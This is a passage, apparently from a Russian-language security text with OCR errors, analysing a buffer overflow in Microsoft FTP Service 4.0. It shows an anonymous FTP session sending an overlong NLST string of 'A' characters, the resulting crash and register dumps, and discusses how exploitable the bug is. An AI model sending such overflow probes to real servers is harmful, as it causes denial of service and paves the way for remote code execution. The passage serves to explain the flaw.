Connected to victim, corn

VICTIM Microsoft FTP Service (Version 4.0).

User (poor.victim.com:(none)): ftp

Anonymous access allowed, send identity (e-mail name) as password.

Password:

Anonymous user logged in.

ftp" Is

АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

PORT command successful.

Opening ASCII mode data connection for file list. -

" ftp: get connection reset by peer

Минимально необходимый объем данных команды NLST, который вызывает

Переполнение, -316 байт, при этом возможен только отказ в обслуживании,

Что следует из содержимого регистров в момент аварийного останова - они

равны:

ЕАХ = 0000005С ЕВХ = 00000001

ЕСХ == OOD3F978 EDX = 002582DD

ESI = OOD3F978 EDI = 00000000

Е1Р = 710F8AA2 ESP = OOD3F644

ЕВР = OOD3F9FO EFL = 00000206

Как видно, ни один из регистров не содержит шестнадцатеричного кода 41,

соответствующего букве "А".

Со строками большей длины картина будет иной, а именно:

ЕАХ = 00000000 ЕВХ = 41414141 ЕСХ = 41414141

EDX = 722С1САС ESI = 41414141

EDI = 41414141 Е1Р = 722C9262 ESP = OOD3F524

ЕВР = OOD3F63C EFL = 00000246

Большое количество кодов (41) означает, что содержимое буфера попадает в

Регистры, правда, не в Е1Р. Следовательно, переполняемый буфер находится

Не в стеке, что усложняет задачу злоумышленника по удаленному выполнению